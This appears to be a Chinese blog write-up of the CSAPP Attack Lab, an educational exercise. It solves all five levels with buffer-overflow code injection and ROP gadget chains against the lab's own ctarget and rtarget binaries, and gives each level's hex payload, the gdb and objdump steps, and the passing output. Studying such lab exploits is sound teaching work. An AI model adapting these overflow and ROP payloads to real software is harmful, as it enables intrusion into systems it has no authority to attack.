

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="https://raw.githubusercontent.com/learner-lu/picbed/master/logo.png">
  <link rel="icon" href="https://raw.githubusercontent.com/learner-lu/picbed/master/logo.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#4a00e0">
  <meta name="author" content="luzhixing12345">
  <meta name="keywords" content="">
  
    <meta name="description" content="基本知识 Attack lab考察的是对缓冲区溢出攻击的理解,x86_64结构以及gdb调试 解压之后可以看到五个文件  README.txt 工具的用途介绍 cookie.txt 作为个人学习者使用的密钥 0x59b997fa ctarget 123关攻击的对象,代码注入攻击 rtarget 45关攻击的对象,返回值攻击 farm.c 小工具农场,我们会在45关中利用这里的汇编字节码 hex2">
<meta property="og:type" content="article">
<meta property="og:title" content="03-AttackLab">
<meta property="og:url" content="https://luzhixing12345.github.io/2022/11/10/CSAPP/03-AttackLab/index.html">
<meta property="og:site_name" content="kamilu的博客">
<meta property="og:description" content="基本知识 Attack lab考察的是对缓冲区溢出攻击的理解,x86_64结构以及gdb调试 解压之后可以看到五个文件  README.txt 工具的用途介绍 cookie.txt 作为个人学习者使用的密钥 0x59b997fa ctarget 123关攻击的对象,代码注入攻击 rtarget 45关攻击的对象,返回值攻击 farm.c 小工具农场,我们会在45关中利用这里的汇编字节码 hex2">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://raw.githubusercontent.com/learner-lu/picbed/master/20221110211517.png">
<meta property="og:image" content="https://raw.githubusercontent.com/learner-lu/picbed/master/20221110224424.png">
<meta property="og:image" content="https://raw.githubusercontent.com/learner-lu/picbed/master/20221110231552.png">
<meta property="og:image" content="https://raw.githubusercontent.com/learner-lu/picbed/master/20221110232817.png">
<meta property="og:image" content="https://raw.githubusercontent.com/learner-lu/picbed/master/20221110235850.png">
<meta property="og:image" content="https://raw.githubusercontent.com/learner-lu/picbed/master/20221111002949.png">
<meta property="article:published_time" content="2022-11-10T06:35:55.000Z">
<meta property="article:modified_time" content="2022-11-11T15:29:09.850Z">
<meta property="article:author" content="luzhixing12345">
<meta property="article:tag" content="CSAPP">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://raw.githubusercontent.com/learner-lu/picbed/master/20221110211517.png">
  
  
  <title>03-AttackLab - kamilu的博客</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4/github-markdown.min.css" />
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hint.css@2/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.css" />
  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"luzhixing12345.github.io","root":"/","version":"1.8.14","typing":{"enable":false,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":"fEy8W8VvIoc26nT53dV2157j-gzGzoHsz","app_key":"s9HXuqmvBWrOaAiLA07Jg59A","server_url":"https://fey8w8vv.lc-cn-n1-shared.com","path":"window.location.pathname","ignore_local":true}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 6.1.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Kamilu-blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('https://raw.githubusercontent.com/learner-lu/picbed/master/background.jpg') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="03-AttackLab">
              
                03-AttackLab
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2022-11-10 14:35" pubdate>
        2022年11月10日 下午
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      8.6k 字
    </span>
  

  
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      72 分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">03-AttackLab</h1>
            
              <p class="note note-info">
                
                  本文最后更新于：2 个月前
                
              </p>
            
            <div class="markdown-body">
              <h2 id="基本知识"><a class="markdownIt-Anchor" href="#基本知识"></a> 基本知识</h2>
<p>Attack lab考察的是对缓冲区溢出攻击的理解,x86_64结构以及gdb调试</p>
<p>解压之后可以看到五个文件</p>
<ul>
<li>README.txt 工具的用途介绍</li>
<li>cookie.txt 作为个人学习者使用的密钥 <code>0x59b997fa</code></li>
<li>ctarget 123关攻击的对象,代码注入攻击</li>
<li>rtarget 45关攻击的对象,返回值攻击</li>
<li>farm.c 小工具农场,我们会在45关中利用这里的汇编字节码</li>
<li>hex2raw 十六进制转字符串,由于部分字节数据是无法通过键盘输入的(比如0x00),这个工具可以将文件中的十六进制数据转为字符串然后输入</li>
</ul>
<blockquote>
<p>相关gdb调试命令和x86_64参数传递等基础知识请参阅BombLab的内容,不再赘述</p>
</blockquote>
<div class="note note-info">
            <p>如果运行 <code>./ctarget -q</code> 没有进入输入环节,而是报错 Segment fault 那么有可能是因为使用的操作系统是Ubuntu22.04及更新,更换为16.04即可解决</p>
          </div>
<h2 id="实验报告"><a class="markdownIt-Anchor" href="#实验报告"></a> 实验报告</h2>
<p>本次实验五关是需要根据实验的文档来依次解决的,开始之前请仔细阅读文档</p>
<h3 id="level1"><a class="markdownIt-Anchor" href="#level1"></a> Level1</h3>
<p>test 函数较为清晰,即接收 <code>getbuf</code> 的返回值并输出</p>
<div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-type">void</span> <span class="hljs-title function_">test</span><span class="hljs-params">()</span> &#123;
    <span class="hljs-type">int</span> val;
    val = getbuf();
    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;No exploit. Getbuf returned 0x%x\n&quot;</span>, val);
&#125;</code></pre></div>
<p>那么主要就是查看<code>getbuf</code> 函数,使用 <code>gdb ctarget</code> <code>disas getbuf</code> 可以看到其汇编代码</p>
<div class="code-wrapper"><pre><code class="hljs txt">0x00000000004017a8 &lt;+0&gt;:     sub    $0x28,%rsp
0x00000000004017ac &lt;+4&gt;:     mov    %rsp,%rdi
0x00000000004017af &lt;+7&gt;:     callq  0x401a40 &lt;Gets&gt;
0x00000000004017b4 &lt;+12&gt;:    mov    $0x1,%eax
0x00000000004017b9 &lt;+17&gt;:    add    $0x28,%rsp
0x00000000004017bd &lt;+21&gt;:    retq</code></pre></div>
<p>这里可以看出来分配了0x28大小的栈空间,也就是40字节,接着调用了Gets函数</p>
<p>所以目前栈中的情况如下</p>
<p><img src="https://raw.githubusercontent.com/learner-lu/picbed/master/20221110211517.png" srcset="/img/loading.gif" lazyload alt="20221110211517" /></p>
<p>所以如果我们希望返回到 <code>touch1</code> 的位置,只需要制造缓冲区溢出覆盖返回地址即可,可以找到 <code>touch1</code> 的起始地址 <code>0x00000000004017c0</code></p>
<div class="code-wrapper"><pre><code class="hljs txt">(gdb) disas touch1
Dump of assembler code for function touch1:
   0x00000000004017c0 &lt;+0&gt;:     sub    $0x8,%rsp
   ...</code></pre></div>
<p>所以我们只需要构造一个前40个字节任意,后8字节为该地址的代码注入即可.同时注意小端存储,即低字节保存在低地址处</p>
<p>所以第一关的答案为</p>
<div class="code-wrapper"><pre><code class="hljs txt">00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
c0 17 40 00</code></pre></div>
<div class="code-wrapper"><pre><code class="hljs bash">root@da1811a84ddc:~/csapp/03Attack Lab/target1<span class="hljs-comment"># ./hex2raw &lt; 1.txt | ./ctarget -q</span>
Cookie: 0x59b997fa
Type string:Touch1!: You called touch1()
Valid solution <span class="hljs-keyword">for</span> level 1 with target ctarget
PASS: Would have posted the following:
        user <span class="hljs-built_in">id</span> bovik
        course  15213-f15
        lab     attacklab
        result  1:PASS:0xffffffff:ctarget:1:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 C0 17 40 00</code></pre></div>
<blockquote>
<p>注意运行时应带上<code>-q</code>参数表示不提交给服务器,同时使用管道符利用<code>hex2raw</code>工具</p>
</blockquote>
<div class="note note-info">
            <p>这里有一个小细节,touch1函数地址完整写法应该是</p><div class="code-wrapper"><pre><code class="hljs txt">c0 17 40 00 00 00 00 00</code></pre></div><p>后四字节(即高四字节的00 00 00 00)可以省略</p><p>虽然原先返回地址也是0x0040开头的,但是后面的两字节 <code>40 00</code> 并不能省略,准确来说<code>00</code>也可以省略但是<code>40</code>不能省略.</p><p>我个人推测有可能是零扩展的原因,不过阅读Gets的汇编源码并没有解决这个问题</p>
          </div>
<h3 id="level2"><a class="markdownIt-Anchor" href="#level2"></a> Level2</h3>
<p>第二关的任务是返回到<code>touch2</code>,并且传入的参数val==cookie的值</p>
<p>显然跳转的过程很容易,但是如果想传入参数,即给rdi赋值那肯定是无法通过简单的栈溢出来做到,我们需要汇编的帮助</p>
<p>先阅读 <code>touch2</code>汇编确定传入的参数放在 <code>rdi</code>中</p>
<div class="code-wrapper"><pre><code class="hljs txt">(gdb) disas touch2
Dump of assembler code for function touch2:
   0x00000000004017ec &lt;+0&gt;:     sub    $0x8,%rsp
   0x00000000004017f0 &lt;+4&gt;:     mov    %edi,%edx
   0x00000000004017f2 &lt;+6&gt;:     movl   $0x2,0x202ce0(%rip)        # 0x6044dc &lt;vlevel&gt;
   0x00000000004017fc &lt;+16&gt;:    cmp    0x202ce2(%rip),%edi        # 0x6044e4 &lt;cookie&gt;</code></pre></div>
<p>根据提示我们可以利用溢出将返回地址指向栈的地址,然后再栈中执行如下汇编代码即可</p>
<div class="code-wrapper"><pre><code class="hljs x86asm"><span class="hljs-keyword">mov</span> <span class="hljs-number">$0</span>x59b997fa, %rdi # 赋值val
<span class="hljs-keyword">push</span> <span class="hljs-number">$0</span>x4017ec        # touch2 地址
<span class="hljs-keyword">ret</span></code></pre></div>
<p>所以现在需要打断点确定rsp的值,这里就在调用 <code>Gets</code> 函数调用前打一个断点</p>
<div class="code-wrapper"><pre><code class="hljs bash">(gdb) b *0x4017af
Breakpoint 1 at 0x4017af: file buf.c, line 14.
(gdb) r -q
Starting program: /root/csapp/03Attack Lab/target1/ctarget -q
Cookie: 0x59b997fa

Breakpoint 1, 0x00000000004017af <span class="hljs-keyword">in</span> getbuf () at buf.c:14
14      buf.c: No such file or directory.
(gdb) info r rsp
rsp            0x5561dc78       0x5561dc78</code></pre></div>
<p>得到输入时栈指针的值是 <code>0x5561dc78</code>, 也就是应该使用栈溢出覆盖的返回地址</p>
<p>接着使用gcc得到汇编对应的字节码</p>
<div class="code-wrapper"><pre><code class="hljs bash">gcc -c 2.s
objdump -d 2.o &gt; 2.d</code></pre></div>
<p>可以得到如下的 <code>2.d</code></p>
<div class="code-wrapper"><pre><code class="hljs txt">2.o:     file format elf64-x86-64


Disassembly of section .text:

0000000000000000 &lt;.text&gt;:
   0:   48 c7 c7 fa 97 b9 59    mov    $0x59b997fa,%rdi
   7:   68 ec 17 40 00          pushq  $0x4017ec
   c:   c3                      retq</code></pre></div>
<p>由于指令的执行是低地址到高地址的,而我们输入的时候也是从低地址向高地址输入的,所以这里并不需要逆序</p>
<p>调用过程如下图所示</p>
<p><img src="https://raw.githubusercontent.com/learner-lu/picbed/master/20221110224424.png" srcset="/img/loading.gif" lazyload alt="20221110224424" /></p>
<p>所以本关答案为</p>
<div class="code-wrapper"><pre><code class="hljs txt">48 c7 c7 fa 97 b9 59 68 ec 17
40 00 c3 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
78 dc 61 55</code></pre></div>
<div class="code-wrapper"><pre><code class="hljs bash">root@da1811a84ddc:~/csapp/03Attack Lab/target1<span class="hljs-comment"># ./hex2raw &lt; 2.txt | ./ctarget -q</span>
Cookie: 0x59b997fa
Type string:Touch2!: You called touch2(0x59b997fa)
Valid solution <span class="hljs-keyword">for</span> level 2 with target ctarget
PASS: Would have posted the following:
        user <span class="hljs-built_in">id</span> bovik
        course  15213-f15
        lab     attacklab
        result  1:PASS:0xffffffff:ctarget:2:48 C7 C7 FA 97 B9 59 68 EC 17 40 00 C3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 DC 61 55</code></pre></div>
<h3 id="level3"><a class="markdownIt-Anchor" href="#level3"></a> Level3</h3>
<p>第三关需要调用 <code>touch3</code>,同时参数是一个字符串的地址,这个字符串是我们的cookie</p>
<p>与上一关不同是这里需要存储一个字符串,并且将首地址放入rdi,而不是直接给rdi赋值</p>
<p>那么我们就应该把这个字符串存放在栈中,可以放在40个字节这个空间中也可以放在返回地址更高地址的地方</p>
<p>但实际上并不能放在40个字节这个空间中,因为可以通过反汇编查看到 <code>touch3</code> <code>hexmatch</code> 函数进行了多次的压栈操作</p>
<div class="code-wrapper"><pre><code class="hljs txt">(gdb) disas touch3
Dump of assembler code for function touch3:
   0x00000000004018fa &lt;+0&gt;:     push   %rbx
   0x00000000004018fb &lt;+1&gt;:     mov    %rdi,%rbx
   0x00000000004018fe &lt;+4&gt;:     movl   $0x3,0x202bd4(%rip)        # 0x6044dc &lt;vlevel&gt;
   0x0000000000401908 &lt;+14&gt;:    mov    %rdi,%rsi
   0x000000000040190b &lt;+17&gt;:    mov    0x202bd3(%rip),%edi        # 0x6044e4 &lt;cookie&gt;
   0x0000000000401911 &lt;+23&gt;:    callq  0x40184c &lt;hexmatch&gt;
   ...

(gdb) disas hexmatch
Dump of assembler code for function hexmatch:
   0x000000000040184c &lt;+0&gt;:     push   %r12
   0x000000000040184e &lt;+2&gt;:     push   %rbp
   0x000000000040184f &lt;+3&gt;:     push   %rbx
   0x0000000000401850 &lt;+4&gt;:     add    $0xffffffffffffff80,%rsp
   ...</code></pre></div>
<p>touch3中push一次,callq一次,hexmatch中push3次. 这样就已经挤占了0x28的空间,显然即使将字符串保存在0x28位置的栈中也会由于后续的压栈操作而被覆盖,所以我们考虑将这个字符串保存到更高地址的位置</p>
<p>我们首先将cookie转换字符串,并且输出其ASCII的值</p>
<div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdio.h&gt;</span></span>
<span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;string.h&gt;</span></span>
<span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">()</span> &#123;
    <span class="hljs-type">char</span> *str = <span class="hljs-string">&quot;59b997fa&quot;</span>;
    <span class="hljs-keyword">for</span> (<span class="hljs-type">int</span> i=<span class="hljs-number">0</span>;i&lt;<span class="hljs-built_in">strlen</span>(str);i++) <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;%x &quot;</span>,str[i]);
    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;\n&quot;</span>);
    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;
&#125;</code></pre></div>
<p>不要忘记最后的字符串结尾是 <code>\0</code>,即0x00,所以cookie的字符串形式对应的十六进制如下</p>
<div class="code-wrapper"><pre><code class="hljs bash">35 39 62 39 39 37 66 61 00</code></pre></div>
<p>接下来我们需要计算这个字符串应该放到哪里,它的地址就应该是 rsp+0x28+0x8 = 0x5561dc78+0x30 = <code>0x5561dca8</code></p>
<p>然后得到 <code>touch3</code> 的地址为 <code>0x4018fa</code></p>
<p>所以需要修改之前的注入汇编代码</p>
<div class="code-wrapper"><pre><code class="hljs x86asm"><span class="hljs-keyword">mov</span> <span class="hljs-number">$0</span>x5561dca8,%rdi
<span class="hljs-keyword">push</span> <span class="hljs-number">$0</span>x4018fa
<span class="hljs-keyword">ret</span></code></pre></div>
<p>得到汇编对应的字节码</p>
<div class="code-wrapper"><pre><code class="hljs txt">3.o:     file format elf64-x86-64


Disassembly of section .text:

0000000000000000 &lt;.text&gt;:
   0:   48 c7 c7 a8 dc 61 55    mov    $0x5561dca8,%rdi
   7:   68 fa 18 40 00          pushq  $0x4018fa
   c:   c3                      retq</code></pre></div>
<p>整个调用过程如图所示</p>
<p><img src="https://raw.githubusercontent.com/learner-lu/picbed/master/20221110231552.png" srcset="/img/loading.gif" lazyload alt="20221110231552" /></p>
<p>所以可以得到本关答案</p>
<div class="code-wrapper"><pre><code class="hljs txt">48 c7 c7 a8 dc 61 55 68 fa 18
40 00 c3 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
78 dc 61 55 00 00 00 00
35 39 62 39 39 37 66 61 00</code></pre></div>
<div class="code-wrapper"><pre><code class="hljs bash">root@da1811a84ddc:~/csapp/03Attack Lab/target1<span class="hljs-comment"># ./hex2raw &lt; 3.txt | ./ctarget -q</span>
Cookie: 0x59b997fa
Type string:Touch3!: You called touch3(<span class="hljs-string">&quot;59b997fa&quot;</span>)
Valid solution <span class="hljs-keyword">for</span> level 3 with target ctarget
PASS: Would have posted the following:
        user <span class="hljs-built_in">id</span> bovik
        course  15213-f15
        lab     attacklab
        result  1:PASS:0xffffffff:ctarget:3:48 C7 C7 A8 DC 61 55 68 FA 18 40 00 C3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 DC 61 55 00 00 00 00 35 39 62 39 39 37 66 61 00</code></pre></div>
<h3 id="level4"><a class="markdownIt-Anchor" href="#level4"></a> Level4</h3>
<p>前三关使用的是代码注入的方式,但现在这种方式已经不行了,因为加入了两种技术</p>
<ul>
<li>栈地址随机初始化,这使得每一次运行程序得到的栈地址都不相同,所以不能像之前一样准确的定位到某一个地址开始执行代码</li>
<li>栈空间不可执行,这使得即使注入了攻击代码,当rip跳转到栈中试图执行代码时也会出现段错误导致失败</li>
</ul>
<p>但是所谓道高一尺魔高一丈,我们可以利用返回值来进行攻击(ROP)</p>
<p>返回值攻击是利用了程序中已知的字节码,大多是由一两条指令跟着一个ret,举一个例子,假设有如下函数</p>
<div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-type">void</span> <span class="hljs-title function_">setval_210</span><span class="hljs-params">(<span class="hljs-type">unsigned</span> *p)</span> &#123;
    *p = <span class="hljs-number">3347663060U</span>;
&#125;</code></pre></div>
<p>看起来这个函数不知所云,其汇编代码如下</p>
<div class="code-wrapper"><pre><code class="hljs txt">0000000000400f15 &lt;setval_210&gt;:
  400f15: c7 07 d4 48 89 c7         movl $0xc78948d4,(%rdi)
  400f1b: c3 retq</code></pre></div>
<p>但是如果我们对照汇编字节码指令的表格,就可以发现第一行后三个字节码 <code>48 89 c7</code> 相当于指令 <code>mov %rax,rdi</code></p>
<p><img src="https://raw.githubusercontent.com/learner-lu/picbed/master/20221110232817.png" srcset="/img/loading.gif" lazyload alt="20221110232817" /></p>
<p>那么这就给我们提供了一种思路,通常来说一个正常函数得到的汇编指令不会在最后几行是比如 <code>popq %rdi</code> <code>mov %rax,rdi</code> 然后ret返回</p>
<p>正常从 <code>0x400f15</code> 调用此函数没什么意义,但是如果从 <code>0x400f18</code> 开始调用,那么这段汇编相当于</p>
<div class="code-wrapper"><pre><code class="hljs txt">0000000000400f18 &lt;attack method!!!&gt;:
  400f18: 48 89 c7         movl %rax,%rdi
  400f1b: c3 retq</code></pre></div>
<p>那么我们就可以利用这种漏洞来进行攻击</p>
<p>文件 <code>farm.c</code> 就提供了这样一组函数&quot;农场&quot;,它们看起来不知所云,但是汇编的字节码充满着可以攻击的手段.我们的任务就是利用这些返回值来攻击</p>
<hr />
<p>那回到本题,要求是再去执行 <code>touch2</code>, 也就是说我们只需要跳转到 <code>touch2</code> 的地址,并且将我们的cookie赋值给 %rdi 即可</p>
<div class="note note-info">
            <p>查找汇编对应的字节码可以使用如下指令将整个程序反汇编保存到 <code>asm.txt</code> 中,然后在vim中查询</p><div class="code-wrapper"><pre><code class="hljs bash">objdump -d rtarget &gt; asm.txt</code></pre></div><p>vim中查询高亮明显可以使用 <code>set hlsearch</code> 使选中的高亮</p>
          </div>
<p>那么赋值操作显然是popq,最理想的就是直接将栈中保存的值<code>0x59b997fa</code> 通过 <code>popq %rdi</code> 赋值给rdi,但是找不到对应的字节码(5f)在合理的位置</p>
<p>但是我们可以找到 <code>popq rax</code>(0x58),后面的(0x90)是nop空指令</p>
<div class="code-wrapper"><pre><code class="hljs txt">00000000004019a7 &lt;addval_219&gt;:
  4019a7:       8d 87 51 73 58 90       lea    -0x6fa78caf(%rdi),%eax
  4019ad:       c3                      retq</code></pre></div>
<p>调用的地址为 <code>0x4019ab</code></p>
<p>接着将rax赋值给rdi,即寻找 <code>48 89 c7</code></p>
<div class="code-wrapper"><pre><code class="hljs txt">00000000004019a0 &lt;addval_273&gt;:
  4019a0:       8d 87 48 89 c7 c3       lea    -0x3c3876b8(%rdi),%eax
  4019a6:       c3                      retq</code></pre></div>
<p>调用的地址为 <code>0x4019a2</code></p>
<p>最后再返回到 <code>touch2</code> 的地址 <code>0x4017ec</code> 即可</p>
<p>整个调用过程如下图</p>
<p><img src="https://raw.githubusercontent.com/learner-lu/picbed/master/20221110235850.png" srcset="/img/loading.gif" lazyload alt="20221110235850" /></p>
<p>所以答案为</p>
<div class="code-wrapper"><pre><code class="hljs txt">00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
ab 19 40 00 00 00 00 00
fa 97 b9 59 00 00 00 00
a2 19 40 00 00 00 00 00
ec 17 40 00 00 00 00 00</code></pre></div>
<div class="code-wrapper"><pre><code class="hljs bash">root@da1811a84ddc:~/csapp/03Attack Lab/target1<span class="hljs-comment"># ./hex2raw  &lt; 4.txt | ./rtarget -q</span>
Cookie: 0x59b997fa
Type string:Touch2!: You called touch2(0x59b997fa)
Valid solution <span class="hljs-keyword">for</span> level 2 with target rtarget
PASS: Would have posted the following:
        user <span class="hljs-built_in">id</span> bovik
        course  15213-f15
        lab     attacklab
        result  1:PASS:0xffffffff:rtarget:2:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 AB 19 40 00 00 00 00 00 FA 97 B9 59 00 00 00 00 A2 19 40 00 00 00 00 00 EC 17 40 00 00 00 00 00</code></pre></div>
<h3 id="level5"><a class="markdownIt-Anchor" href="#level5"></a> Level5</h3>
<p>最后一关是去调用 <code>touch3</code>, 并且传入一个参数rdi是cookie的字符串的首地址</p>
<p>那么我们可以分析一下,这个字符串一定是保存在栈中的,也就是整个栈的最上面.那么我们需要在某一个时刻获取rsp,然后利用rsp+bias获取到起始地址,并且将这个地址赋给rdi即可</p>
<p>非常幸运的是我们可以在 <code>farm.c</code> 中找到这样一个函数</p>
<div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-type">long</span> <span class="hljs-title function_">add_xy</span><span class="hljs-params">(<span class="hljs-type">long</span> x, <span class="hljs-type">long</span> y)</span>
&#123;
    <span class="hljs-keyword">return</span> x+y;
&#125;</code></pre></div>
<p>其汇编如下,也就是说我们需要把rsp赋值给rdi,然后把bias赋值给rsi,这样就得到了最终的字符串首地址,把rax再赋值给rdi即可</p>
<div class="code-wrapper"><pre><code class="hljs txt">00000000004019d6 &lt;add_xy&gt;:
  4019d6:       48 8d 04 37             lea    (%rdi,%rsi,1),%rax
  4019da:       c3                      retq</code></pre></div>
<p>这里的bias我们现在不能确定,应该是整个流程需要的指令数量确定了之后才可以计算出来</p>
<p>那么整个思路其实已经比较清晰了,只需要再对着这个表格搜索需要的就可以了</p>
<blockquote>
<p>注意使用 movl 以及后面如果是双字节的nop指令(andb/orb)也可以利用</p>
</blockquote>
<p>本题答案唯一,只使用farm.c中的函数没有其他的走法,寄存器的转移是固定的,这里就不再一一分析了,直接给出本题答案</p>
<p>整个过程调用如下图所示</p>
<p><img src="https://raw.githubusercontent.com/learner-lu/picbed/master/20221111002949.png" srcset="/img/loading.gif" lazyload alt="20221111002949" /></p>
<p>由此可以计算出 bias 的值应该为 <code>0x48</code></p>
<p>所以本题答案为</p>
<div class="code-wrapper"><pre><code class="hljs txt">00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
06 1a 40 00 00 00 00 00
a2 19 40 00 00 00 00 00
ab 19 40 00 00 00 00 00
48 00 00 00 00 00 00 00
dd 19 40 00 00 00 00 00
34 1a 40 00 00 00 00 00
13 1a 40 00 00 00 00 00
d6 19 40 00 00 00 00 00
a2 19 40 00 00 00 00 00
fa 18 40 00 00 00 00 00
35 39 62 39 39 37 66 61 00</code></pre></div>
<div class="code-wrapper"><pre><code class="hljs bash">root@da1811a84ddc:~/csapp/03Attack Lab/target1<span class="hljs-comment"># ./hex2raw &lt; 5.txt | ./rtarget -q</span>
Cookie: 0x59b997fa
Type string:Touch3!: You called touch3(<span class="hljs-string">&quot;59b997fa&quot;</span>)
Valid solution <span class="hljs-keyword">for</span> level 3 with target rtarget
PASS: Would have posted the following:
        user <span class="hljs-built_in">id</span> bovik
        course  15213-f15
        lab     attacklab
        result  1:PASS:0xffffffff:rtarget:3:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 1A 40 00 00 00 00 00 A2 19 40 00 00 00 00 00 AB 19 40 00 00 00 00 00 48 00 00 00 00 00 00 00 DD 19 40 00 00 00 00 00 34 1A 40 00 00 00 00 00 13 1A 40 00 00 00 00 00 D6 19 40 00 00 00 00 00 A2 19 40 00 00 00 00 00 FA 18 40 00 00 00 00 00 35 39 62 39 39 37 66 61 00</code></pre></div>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/CSAPP/">CSAPP</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
